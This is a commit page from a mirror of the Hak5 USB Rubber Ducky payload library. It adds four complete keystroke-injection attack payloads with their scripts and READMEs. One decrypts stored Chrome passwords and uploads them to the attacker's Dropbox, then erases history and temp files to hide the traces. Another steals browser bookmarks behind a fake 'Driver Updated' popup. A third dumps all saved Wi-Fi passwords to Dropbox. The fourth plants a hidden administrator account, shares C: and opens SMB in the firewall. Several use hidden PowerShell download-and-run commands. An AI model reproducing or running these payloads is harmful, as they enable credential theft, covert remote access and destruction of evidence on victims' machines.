hak5
/
usbrubberducky-payloads
mirror of https://github.com/hak5/usbrubberducky-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'hak5:master' into master

pull/131/head
Factor101 2022-08-30 13:20:34 -04:00 committed by GitHub
parent 6203ecdf53 addc4f30c8
commit 45e9de99c8
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
10 changed files with 533 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

30
payloads/library/credentials/Browser-Passwords-Dropbox-Exfiltration/ReadMe.md Normal file
View File

@ -0,0 +1,30 @@
## About:
* Title: Browser-Passwords-Dropbox-Exfiltration
* Description: Opens PowerShell hidden, grabs Chrome passwords, saves as a cleartext file and exfiltrates info via Dropbox.
* Then it cleans up traces of what you have done after.
* AUTHOR: DIYS.py
* Version: 1.0
* Category: Credentials, Exfiltration
* Target: Windows 10
* Attackmodes: HID
### Features:
* Reasonably stelathy
* Fairly quick
### Workflow:
* Encoding payload and injecting on target's system.
* Checks Chrome files and obtains the stored browser credentials
* Saves a plaintext file of all of the usernames, passwords, websites
* Deletes the Temp files, recycle bin, Run and PowerShell history
### Usage Version 01:
1. Follow the instructions on the link enclosed in the PowerShell script to create the correct API access credentials for your Dropbox account.
2. Obtain your Authentication Token and add it to the PowerShell script, upload that script to your dropbox and add the link to it in the payload file.
3. Encode payload.txt and inject into target's system.
4. Check your Dropbox for the files.
### Possible Issues:
1. AVG detected this was trying to access Chrome info and blocked it from working some of the time.
DIYSpy on Twitter

101
payloads/library/credentials/Browser-Passwords-Dropbox-Exfiltration/Version 01/Browser-Passwords-Dropbox-Exfiltration.ps1 Normal file
View File

@ -0,0 +1,101 @@
#########################################################################################################
# | #
# Title : Browser-Passwords-Dropbox-Exfiltration | ____ _____ ______ #
# Author : DIYS.py | | _ \_ _\ \ / / ___| _ __ _ _ #
# Version : 1.0 | | | | | | \ V /\___ \ | '_ \| | | | #
# Category : Credentials, Exfiltration | | |_| | | | | ___) || |_) | |_| | #
# Target : Windows 10 | |____/___| |_| |____(_) .__/ \__, | #
# Mode : HID | |_| |___/ #
# Props : I am Jakoby, NULLSESSION0X | #
# | #
#########################################################################################################
<#
.SYNOPSIS
This script exfiltrates credentials from the browser via Dropbox.
.DESCRIPTION
Checkes and saves the credentials from the Chrome browser, then connects to Dropbox and uploads
the file containing all of the loot.
.Link
https://developers.dropbox.com/oauth-guide # Guide for setting up your DropBox for uploads
#>
$DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN"
$FileName = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_User-Creds.txt"
#Stage 1 Obtain the credentials from the Chrome browsers User Data folder
#First we Kill Chrome just to be safe
Stop-Process -Name Chrome
$d=Add-Type -A System.Security
$p='public static'
$g=""")]$p extern"
$i='[DllImport("winsqlite3",EntryPoint="sqlite3_'
$m="[MarshalAs(UnmanagedType.LP"
$q='(s,i)'
$f='(p s,int i)'
$z=$env:LOCALAPPDATA+'\Google\Chrome\User Data'
$u=[Security.Cryptography.ProtectedData]
Add-Type "using System.Runtime.InteropServices;using p=System.IntPtr;$p class W{$($i)open$g p O($($m)Str)]string f,out p d);$($i)prepare16_v2$g p P(p d,$($m)WStr)]string l,int n,out p s,p t);$($i)step$g p S(p s);$($i)column_text16$g p C$f;$($i)column_bytes$g int Y$f;$($i)column_blob$g p L$f;$p string T$f{return Marshal.PtrToStringUni(C$q);}$p byte[] B$f{var r=new byte[Y$q];Marshal.Copy(L$q,r,0,Y$q);return r;}}"
$s=[W]::O("$z\\Default\\Login Data",[ref]$d)
$l=@()
if($host.Version-like"7*"){$b=(gc "$z\\Local State"|ConvertFrom-Json).os_crypt.encrypted_key
$x=[Security.Cryptography.AesGcm]::New($u::Unprotect([Convert]::FromBase64String($b)[5..($b.length-1)],$n,0))}$_=[W]::P($d,"SELECT*FROM logins WHERE blacklisted_by_user=0",-1,[ref]$s,0)
for(;!([W]::S($s)%100)){$l+=[W]::T($s,0),[W]::T($s,3)
$c=[W]::B($s,5)
try{$e=$u::Unprotect($c,$n,0)}catch{if($x){$k=$c.length
$e=[byte[]]::new($k-31)
$x.Decrypt($c[3..14],$c[15..($k-17)],$c[($k-16)..($k-1)],$e)}}$l+=($e|%{[char]$_})-join''}
#After Decrypting the contents of the files, save them to a file in the temp folder.
echo $l >> $env:TMP\$FileName
#Start Chrome again
$pathToChrome = 'C:\Program Files (x86)\Google\Chrome\Application\chrome.exe'
Start-Process -FilePath $pathToChrome
#Stage 2 Upload them to Dropbox
<#
.NOTES
This is to upload your files to dropbox
#>
$TargetFilePath="/$FileName"
$SourceFilePath="$env:TMP\$FileName"
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
$authorization = "Bearer " + $DropBoxAccessToken
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
$headers.Add("Authorization", $authorization)
$headers.Add("Dropbox-API-Arg", $arg)
$headers.Add("Content-Type", 'application/octet-stream')
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
#Stage 3 Cleanup Traces
<#
.NOTES
This is to clean up behind you and remove any evidence to prove you were there
#>
# Delete contents of Temp folder
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
# Delete run box history
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
# Delete powershell history
Remove-Item (Get-PSreadlineOption).HistorySavePath
# Deletes contents of recycle bin
Clear-RecycleBin -Force -ErrorAction SilentlyContinue
exit

25
payloads/library/credentials/Browser-Passwords-Dropbox-Exfiltration/Version 01/payload.txt Normal file
View File

@ -0,0 +1,25 @@
REM #########################################################################################################
REM # | #
REM # Title : Browser-Passwords-Dropbox-Exfiltration | ____ _____ ______ #
REM # Author : DIYS.py | | _ \_ _\ \ / / ___| _ __ _ _ #
REM # Version : 1.0 | | | | | | \ V /\___ \ | '_ \| | | | #
REM # Category : Credentials, Exfiltration | | |_| | | | | ___) || |_) | |_| | #
REM # Target : Windows 10 (PowerShell + Chrome) | |____/___| |_| |____(_) .__/ \__, | #
REM # Mode : HID | |_| |___/ #
REM # Props : I am Jakoby, NULLSESSION0X | #
REM # Description : Opens PowerShell hidden, grabs Chrome | #
REM # passwords, saves as a cleartext file and | #
REM # exfiltrates info via Dropbox. | #
REM # Then it cleans up traces of what you have done | #
REM # after. | #
REM #########################################################################################################
ATTACKMODE HID
DELAY 3000
GUI r
DELAY 250
STRINGLN powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://< Your Shared link for the intended file>?dl=1; invoke-expression $pl
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly

28
payloads/library/credentials/Browser-Passwords-Dropbox-Exfiltration/payload.txt Normal file
View File

@ -0,0 +1,28 @@
REM #########################################################################################################
REM # | #
REM # Title : Browser-Passwords-Dropbox-Exfiltration | ____ _____ ______ #
REM # Author : DIYS.py | | _ \_ _\ \ / / ___| _ __ _ _ #
REM # Version : 1.0 | | | | | | \ V /\___ \ | '_ \| | | | #
REM # Category : Credentials, Exfiltration | | |_| | | | | ___) || |_) | |_| | #
REM # Target : Windows 10 | |____/___| |_| |____(_) .__/ \__, | #
REM # Mode : HID | |_| |___/ #
REM # Props : I am Jakoby, NULLSESSION0X | #
REM # | #
REM #########################################################################################################
REM Title: Browser-Passwords-Dropbox-Exfiltration
REM Author: DIYS.py
REM Description: Opens PowerShell hidden, grabs Chrome passwords, saves as a cleartext file and exfiltrates info via Dropbox.
REM Then it cleans up traces of what you have done after.
REM Target: Windows 10 (PowerShell + Chrome)
REM Version: 1.0
REM Category: Credentials, Exfiltration
DELAY 3000
GUI r
DELAY 250
STRINGLN powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://< Your Shared link for the intended file>?dl=1; invoke-expression $pl
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly

63
payloads/library/exfiltration/Bookmark-Hog/BH.ps1 Normal file
View File

@ -0,0 +1,63 @@
#Bookmark-Hog
# See if file is a thing
Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf
#If the file does not exist, write to host.
if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf)) {
try {
Write-Host "The chrome bookmark file has not been found. "
}
catch {
throw $_.Exception.Message
}
}
# Copy Chrome Bookmarks to Bash Bunny
else {
$F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_chrome_bookmarks.txt"
Copy-Item "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -Destination "$env:tmp/$F1"
}
# See if file is a thing
Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -PathType Leaf
#If the file does not exist, write to host.
if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -PathType Leaf)) {
try {
Write-Host "The edge bookmark file has not been found. "
}
catch {
throw $_.Exception.Message
}
}
# Copy Chrome Bookmarks to Bash Bunny
else {
$F2 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_edge_bookmarks.txt"
Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -Destination "$env:tmp/$F2"
}
function DropBox-Upload {
[CmdletBinding()]
param (
[Parameter (Mandatory = $True, ValueFromPipeline = $True)]
[Alias("f")]
[string]$SourceFilePath
)
$DropBoxAccessToken = "YOUR ACCESS TOKEN" # Replace with your DropBox Access Token
$outputFile = Split-Path $SourceFilePath -leaf
$TargetFilePath="/$outputFile"
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
$authorization = "Bearer " + $DropBoxAccessToken
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
$headers.Add("Authorization", $authorization)
$headers.Add("Dropbox-API-Arg", $arg)
$headers.Add("Content-Type", 'application/octet-stream')
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
}
DropBox-Upload -f "$env:tmp/$F1"
DropBox-Upload -f "$env:tmp/$F2"
$done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1)

112
payloads/library/exfiltration/Bookmark-Hog/README.md Normal file
View File

@ -0,0 +1,112 @@
<img src="https://github.com/atomiczsec/My-Payloads/blob/main/Assets/bm-hog.png?" width="200">
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Bookmark+Hog!+😈&center=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Bookmark-Hog
A payload to exfiltrate bookmarks of the 2 most popular browsers
## Description
This payload will enumerate through the browser directories, looking for the file that stores the bookmark history
These files will be saved to the temp directory
Finally dropbox will be used to exfiltrate the files to cloud storage
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>

16
payloads/library/exfiltration/Bookmark-Hog/payload.txt Normal file
View File

@ -0,0 +1,16 @@
REM Title: Bookmark-Hog
REM Author: atomiczsec
REM Description: This payload is meant to exfiltrate bookmarks to the rubber ducky
REM Target: Windows 10, 11
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1

45
payloads/library/exfiltration/WIFIPASS-to-Dropbox/payload.txt Normal file
View File

@ -0,0 +1,45 @@
REM ph3llin's wifi-to-dropbox
REM GRABS ALL WIFI PASSWORDS ON WINDOWS CREATES log.txt ON DESKTOP THEN UPLOADS TO YOUR DROPBOX MUST EDIT DROP BOX TOKEN BELOW
DELAY 2000
GUI R
DELAY 200
STRING cmd
ENTER
DELAY 200
STRING powershell
ENTER
DELAY 200
STRING (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | % {(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ SSID=$name;PASSWORD=$pass }} | Format-Table -AutoSize > $env:USERPROFILE\Desktop\log.txt
DELAY 100
ENTER
DELAY 100
STRING $targetPathAndFilename = ' "/log.txt" '
ENTER
STRING $arg = '{ "path": '+$targetpathAndFilename+', "mode": "add", "autorename": true, "mute": false }'
ENTER
REM go to "https://www.dropbox.com/developers/apps/create?_tk=pilot_lp&_ad=ctabtn1&_camp=create " create app and get token and put in place of "PUTYOURDROPBOXTOKENHERE" ** keep "Bearer "
STRING $authorization = "Bearer PUTYOURDROPBOXTOKENHERE"
ENTER
STRING $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
ENTER
STRING $headers.Add("Authorization", $authorization)
ENTER
STRING $headers.Add("Dropbox-API-Arg", $arg)
ENTER
STRING $headers.Add("Content-Type", 'application/octet-stream')
ENTER
STRING $response = Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $env:USERPROFILE\Desktop\log.txt -Headers $headers
ENTER
DELAY 100
REM bottom code with delete log.txt and exit powershell
STRING cd $env:USERPROFILE\Desktop
ENTER
DELAY 100
STRING del log.txt
ENTER
DELAY 100
STRING exit
ENTER
DELAY 100
STRING exit
ENTER

36
payloads/library/remote_access/win_smb-backdoor/README.md Normal file
View File

@ -0,0 +1,36 @@
# "Microsoft Windows" SMB Backdoor
- Title: "Microsoft Windows" SMB Backdoor
- Author: TW-D
- Version: 1.0
- Target: Microsoft Windows
- Category: Remote Access
## Description
1) Adds a user account (RD_User:RD_P@ssW0rD).
2) Adds this local user to local administrator group.
3) Shares "C:" directory (RD_SHARE).
4) Adds a rule to the firewall.
5) Sets a value to "LocalAccountTokenFilterPolicy" to access the "C:" with a local account.
6) Hides this user account.
## Exploitation
>
> The connection identifiers will be those defined by the values : **RD_User** and **RD_P@ssW0rD**.
>
```
hacker@hacker-computer:~$ python3 /opt/impacket/examples/psexec.py ./RD_User:RD_P@ssW0rD@<TARGET>
C:\WINDOWS\system32> whoami
nt authority\system
```
>
> The connection identifiers and the share name will be those defined by the values : **RD_SHARE**, **RD_User** and **RD_P@ssW0rD**.
>
```
smb://<TARGET>/RD_SHARE/
```

77
payloads/library/remote_access/win_smb-backdoor/payload.txt Normal file
View File

@ -0,0 +1,77 @@
REM #
REM # Title: "Microsoft Windows" SMB Backdoor
REM #
REM # Description:
REM # 1) Adds a user account (RD_User:RD_P@ssW0rD).
REM # 2) Adds this local user to local administrator group.
REM # 3) Shares "C:" directory (RD_SHARE).
REM # 4) Adds a rule to the firewall.
REM # 5) Sets a value to "LocalAccountTokenFilterPolicy" to access the "C:" with a local account.
REM # 6) Hides this user account.
REM #
REM # Author: TW-D
REM # Version: 1.0
REM # Category: Remote Access
REM # Target: Microsoft Windows
REM #
REM # TESTED ON
REM # ===============
REM # Microsoft Windows 10 Family Version 20H2 (PowerShell 5.1)
REM # Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1)
REM #
REM # REQUIREMENTS
REM # ===============
REM # The target user must belong to the 'Administrators' group.
REM #
REM ######## INITIALIZATION ########
DELAY 2000
REM ######## STAGE1 ########
GUI r
DELAY 3000
STRING cmd
DELAY 1000
CTRL-SHIFT ENTER
DELAY 3000
LEFTARROW
DELAY 5000
ENTER
DELAY 5000
REM ######## STAGE2 ########
STRING NET USER RD_User RD_P@ssW0rD /ADD
ENTER
DELAY 1500
STRING NET LOCALGROUP Administrators RD_User /ADD
ENTER
DELAY 1500
REM ######## STAGE3 ########
STRING NET SHARE RD_SHARE=C:\ /GRANT:RD_User,FULL /REMARK:"RRemote DShare"
ENTER
DELAY 1500
STRING NETSH ADVFIREWALL FIREWALL ADD RULE NAME="Server Message Block for RD" PROTOCOL=TCP LOCALPORT=445 DIR=IN ACTION=ALLOW PROFILE=PUBLIC,PRIVATE,DOMAIN
ENTER
DELAY 1500
REM ######## STAGE4 ########
STRING REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /f /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1
ENTER
DELAY 1500
STRING REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /f /v RD_User /t REG_DWORD /d 0
ENTER
DELAY 1500
REM ######## FINISH ########
STRING EXIT
ENTER